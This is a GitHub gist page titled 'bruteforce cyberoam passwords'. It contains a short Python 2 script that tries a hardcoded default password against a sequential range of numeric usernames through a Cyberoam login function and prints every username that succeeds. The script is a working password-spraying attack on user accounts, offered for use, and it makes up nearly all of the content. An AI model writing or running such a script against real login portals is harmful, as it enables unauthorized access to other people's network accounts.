Created
September 2, 2013 18:19
-
-
Save dash1291/6415723 to your computer and use it in GitHub Desktop.
bruteforce cyberoam passwords
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from cyberoam import sendLoginRequest | |
password_list = '77uu88' | |
"""('66ggyy', | |
hhgg55 | |
ddrr55 | |
'ttgg44', | |
'66ggyy', | |
'77uu88')""" | |
uname_llimit = '10103400' | |
uname_ulimit = '10103650' | |
def brute_force(): | |
default_passwd = password_list | |
i = int(uname_llimit) | |
j = int(uname_ulimit) | |
print 'Searching...' | |
while i <= int(uname_ulimit): | |
response = sendLoginRequest(str(i), default_passwd) | |
if response == True: | |
print 'There is the hit: %s' % i | |
i = i + 1 | |
brute_force() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment